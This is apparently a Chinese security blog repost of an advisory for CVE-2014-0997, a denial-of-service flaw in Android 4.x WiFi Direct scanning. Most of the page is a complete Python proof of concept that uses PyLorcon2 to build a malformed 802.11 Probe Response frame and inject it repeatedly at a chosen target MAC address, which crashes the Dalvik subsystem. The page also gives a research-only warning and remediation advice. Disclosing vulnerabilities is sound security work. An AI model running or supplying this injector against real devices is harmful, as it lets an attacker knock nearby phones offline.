多个Android设备拒绝服务漏洞

  • A+
所属分类:移动安全


受影响系统:
Android Android 4.x
不受影响系统:
Android Android 5.0.2
Android Android 5.0.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 72311
CVE(CAN) ID: CVE-2014-0997

Android是基于Linux开放性内核的操作系统,是Google公司在2007年11月5日公布的手机操作系统。

某些Android设备扫描WiFi Direct设备时会受到拒绝服务攻击的影响,攻击者发送精心构造的802.11 Probe Response帧,造成WiFiMonitor类上未处理异常,导致Dalvik子系统重启。

<*来源:Andres Blanco
*>

测试方法:
--------------------------------------------------------------------------------
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/env python

import sys
import time
import struct
import PyLorcon2


def get_probe_response(source, destination, channel):
frame = str()
frame += "\x50\x00" # Frame Control
frame += "\x00\x00" # Duration
frame += destination
frame += source
frame += source
frame += "\x00\x00" # Sequence Control
frame += "\x00\x00\x00\x00\x00\x00\x00\x00" # Timestamp
frame += "\x64\x00" # Beacon Interval
frame += "\x30\x04" # Capabilities Information

# SSID IE
frame += "\x00"
frame += "\x07"
frame += "DIRECT-"

# Supported Rates
frame += "\x01"
frame += "\x08"
frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"

# DS Parameter Set
frame += "\x03"
frame += "\x01"
frame += struct.pack("B", channel)

# P2P
frame += "\xDD"
frame += "\x27"
frame += "\x50\x6F\x9A"
frame += "\x09"
# P2P Capabilities
frame += "\x02" # ID
frame += "\x02\x00" # Length
frame += "\x21\x00"
# P2P Device Info
frame += "\x0D" # ID
frame += "\x1B\x00" # Length
frame += source
frame += "\x01\x88"
frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"
frame += "\x00"
frame += "\x10\x11"
frame += "\x00\x06"
frame += "fafa\xFA\xFA"

return frame


def str_to_mac(address):
return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))


if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage:"
print " poc.py <iface> <target>"
print "Example:"
print " poc.py wlan0 00:11:22:33:44:55"
sys.exit(-1)

iface = sys.argv[1]
destination = str_to_mac(sys.argv[2])

context = PyLorcon2.Context(iface)
context.open_injmon()

channel = 1
source = str_to_mac("00:11:22:33:44:55")
frame = get_probe_response(source, destination, channel)

print "Injecting PoC."
for i in range(100):
context.send_bytes(frame)
time.sleep(0.100)

建议:
--------------------------------------------------------------------------------
厂商补丁:

Android
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.openhandsetalliance.com/android_overview.html

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: